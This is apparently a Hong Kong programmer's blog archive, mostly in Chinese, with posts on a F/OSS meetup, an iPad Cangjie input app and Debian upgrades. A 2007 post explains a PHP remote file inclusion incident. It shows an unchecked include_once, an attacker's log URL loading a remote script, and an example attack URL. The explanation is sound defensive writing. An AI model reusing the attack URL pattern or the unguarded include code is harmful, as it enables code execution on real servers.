5月19日晚是Hacking Thursday Hong Kong(H4HK-駭能工程)的首次聚會, 出乎意料的大成功. 原本活動只預8人, 最後有15人出席. 當晚由YAHOO麻雀, 到看過什麼小說, 天南地北無所不談. 當中有些小插曲, 當晚亦有另一網上組織Travel Life在同一CAFE聚會, 不少當日Travel Life聚會的參加者都認錯了我們H4HK而誤入了我們的活動.
什麼是駭能工程呢? 駭能工程是一個定期CAFE聚會, 現暫定為2星期一次, 主要由HK不同F/OSS組織成員及自由或開源軟開發者所辦, 目的是為了加強香港F/OSS的向心力, 以及吸引更多新血加入討論、開發或推廣自由或開源軟體; 以輕鬆閒聊的方式, 討論各類現時流行的IT話題、技術、甚至工作上所遇到的難題、心得、八封等, 以避開以前一直讓人覺得很嚴肅的討論來達到我們的目的. 聚會本身會採取無主題方式, 但若有參加者希望能集中討論某一主題, 可預先提出.
何解要辦這個活動呢? 有鑑於近年F/OSS活動在香港好像有些青黃不接之勢, 而且自2008年後HKLUG已經沒有任何的活動, 而其他F/OSS的活動所出席之人物來來去去都是我們這班人, 沒什麼新血. 所以希望有一些新類型的活動, 來重新凝聚香港F/OSS的力量. 所以我們參照台灣的Hacking Thursday來舉辦Hacking Thursday Hong Kong.
為何Hacking Thursday Hong Kong中文名會叫做「駭能工程」? 事緣我們在準備辦H4HK時, 忽然想要個中文名, 最初是「香港駭四」, 取其近日取熱門的「核能」的食字GAG, 四和星期四有關, 而台灣有核四, 借喻為仿台活動. 之後是「駭死香港」, 取死和四為粵語同音之意. 最後由ShawTim的「駭能工程」成為H4HK的中文名, 「駭能」取其近日取熱門的「核能」食字, 而駭能同粵語可解為「能駭的人」有關, 而「駭能工程」在英文亦可成為「駭的技術能帶領工程」的意思.
下次的聚會於6月2日, 由於有參加者提出集中討論某些題目. 所以第二期的討論會集中於OLPC及CODE REVIEW. 當然, 可以再加新題目, 或純以吹水為目的的也行.
詳情請留意官站: http://h4.opensource.hk/
以及其FACEBOOK GROUP的消息.
Showing posts with label Programming. Show all posts
Showing posts with label Programming. Show all posts
Sunday, May 22, 2011
Friday, October 01, 2010
本人在App Store上的第一隻APP: Cangjie Traditional Chinese Input
因SERVER有問題及無時間,無寫幾個月BLOG了。一寫,就要賣一賣廣告。
小弟第一隻IPHONE APP:Cangjie Traditional Chinese Input上了APP STORE了,是一隻實際上寫給自己用的,可在IPAD上用倉頡打傳統中文的APP。不過既然寫了出來,安裝入IPAD上亦要買US$99的DEV ACCOUNT,那麼不如順手放上APP STORE做福人群。

經過1個月的等待,APPLE終於在9月16日APPROVE,經歴一星期在香港區下載第一位的寶座後,現在已跌落三十幾位,但在工具區仍是第一位。
而在9月28日APPLE亦APPROVE了1.1版,這個版本加入了速成輸入法。
其實這個Cangjie Traditional Chinese Input的打字方式,我刻意做到和我平時在電腦用英文KEYBOARD打字的情況一樣,都是按下空白鍵後才會選時,這個APP用藍牙或USB KEYBOARD上打字是一流的,因為在選字是可直接打數字去選。
本人因打倉頡是用第五代的倉頡碼,而WINDOWS用的倉頡碼是第三代的,所以本APP支援第5代和第3代的倉頡碼。
由於只是自己用,所以功能簡單,做到覺得夠用就完了。
寫這APP,輸入法的核心,認碼,其實只用了一小時就完成了,而最困難的地方是UI和收集KEYBOARD的EVENT,那裡花了2晚時間。而因為UIKeyboard這個CLASS,APPLE SDK沒有提供header file,所以不能修改KEYBOARD的字做中文字,因此只能顯示英文(雖然我習慣打英文KEYBOARD和英文倉頡碼)。
而隨著11月IOS4.2的來臨,本APP亦將會完成其歴史任務了。
小弟第一隻IPHONE APP:Cangjie Traditional Chinese Input上了APP STORE了,是一隻實際上寫給自己用的,可在IPAD上用倉頡打傳統中文的APP。不過既然寫了出來,安裝入IPAD上亦要買US$99的DEV ACCOUNT,那麼不如順手放上APP STORE做福人群。

經過1個月的等待,APPLE終於在9月16日APPROVE,經歴一星期在香港區下載第一位的寶座後,現在已跌落三十幾位,但在工具區仍是第一位。
而在9月28日APPLE亦APPROVE了1.1版,這個版本加入了速成輸入法。
其實這個Cangjie Traditional Chinese Input的打字方式,我刻意做到和我平時在電腦用英文KEYBOARD打字的情況一樣,都是按下空白鍵後才會選時,這個APP用藍牙或USB KEYBOARD上打字是一流的,因為在選字是可直接打數字去選。本人因打倉頡是用第五代的倉頡碼,而WINDOWS用的倉頡碼是第三代的,所以本APP支援第5代和第3代的倉頡碼。
由於只是自己用,所以功能簡單,做到覺得夠用就完了。
寫這APP,輸入法的核心,認碼,其實只用了一小時就完成了,而最困難的地方是UI和收集KEYBOARD的EVENT,那裡花了2晚時間。而因為UIKeyboard這個CLASS,APPLE SDK沒有提供header file,所以不能修改KEYBOARD的字做中文字,因此只能顯示英文(雖然我習慣打英文KEYBOARD和英文倉頡碼)。而隨著11月IOS4.2的來臨,本APP亦將會完成其歴史任務了。
Sunday, March 23, 2008
參加Impromptu Code Jam
3月19日出席了由Agile Hong Kong 辦的WORKSHOP,去體驗PAIR PROGRAMMING。
之後和舊同事以及主辦單位一行13人一同食晚飯。最後回到家中已是零晨1時30分。
覺得這類WORKSHOP不錯,除了可學到不同的知識外,還可識到不少行內人。
而且這類SOLVE PROBLEM的問題,很久沒有做過,做完感覺腦筋好像清晰了不少,很久都沒試過有這樣的感覺。
之前去過不少技術交流的聚會,但像這次需要寫CODE還是第一次。
那個PROGRAM問題,之後我用PERL花了5分鐘寫了20行CODE就完成了,不過得到的答案是2531,5683,這個是有處理字的。而把數字排除在外的話,所得的答案為2534,5691。仍和他們所給的答案2530, 5680有分別。
之後和舊同事以及主辦單位一行13人一同食晚飯。最後回到家中已是零晨1時30分。
覺得這類WORKSHOP不錯,除了可學到不同的知識外,還可識到不少行內人。
而且這類SOLVE PROBLEM的問題,很久沒有做過,做完感覺腦筋好像清晰了不少,很久都沒試過有這樣的感覺。
之前去過不少技術交流的聚會,但像這次需要寫CODE還是第一次。
那個PROGRAM問題,之後我用PERL花了5分鐘寫了20行CODE就完成了,不過得到的答案是2531,5683,這個是有處理字的。而把數字排除在外的話,所得的答案為2534,5691。仍和他們所給的答案2530, 5680有分別。
Saturday, March 22, 2008
把Debian上lenny(testing)
終於把家中的WORK STATION和LAPTOP上的DEBAIN, UPGRADE到TESTING VERSION。
GNOME的速度比以前快了些,而字體就比以前減了2個SIZE,應該FIX了上一個版本字體雖SET為同一SIZE,但在GNOME中字體比KDE大的問題。
另外TESTING VERSION中,多了開機動畫。
其他功能還在測試中。
GNOME的速度比以前快了些,而字體就比以前減了2個SIZE,應該FIX了上一個版本字體雖SET為同一SIZE,但在GNOME中字體比KDE大的問題。
另外TESTING VERSION中,多了開機動畫。
其他功能還在測試中。
Sunday, February 18, 2007
Security Issue in PHP - include_once
There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:
When I go the the php file and know how the cracker crack the system. The problem is about php.
The problem is that the $pagename does not have any gruad to check the value that got by $_Get['name'].
The function of include_once is allow to include the source from outside, http://example.com/aaa.php
So, when cracker use a 'http://example.org/aaa.txt?' as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,
The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:
That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.
So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.
1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?When I go the the php file and know how the cracker crack the system. The problem is about php.
<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...
The problem is that the $pagename does not have any gruad to check the value that got by $_Get['name'].
The function of include_once is allow to include the source from outside, http://example.com/aaa.php
So, when cracker use a 'http://example.org/aaa.txt?' as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,
The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:
<?php include_once("http://example.org/aaa.txt?_main.inc");?>
That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.
So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.
Monday, June 12, 2006
Install Perl CPAN Modules in debain
To use deb rather than source.
http://www.debian-administration.org/articles/78
http://www.debian-administration.org/articles/78
Friday, December 23, 2005
MySQL
grant update, insert, delete, select on *.* to user@host identified by 'passwd';
flush privileges;
flush privileges;
Friday, December 02, 2005
Monday, January 31, 2005
Final Year Project
I am trying my best to finish my final year project these days.
My final year project is about cryptography.
I need to program at least 3 small programs to show that how the DES, RSA, and MD5 work.
I am still programing the DES and MD5. I need time...
Just so tired, and haven't sleep for few days...
Subscribe to:
Posts (Atom)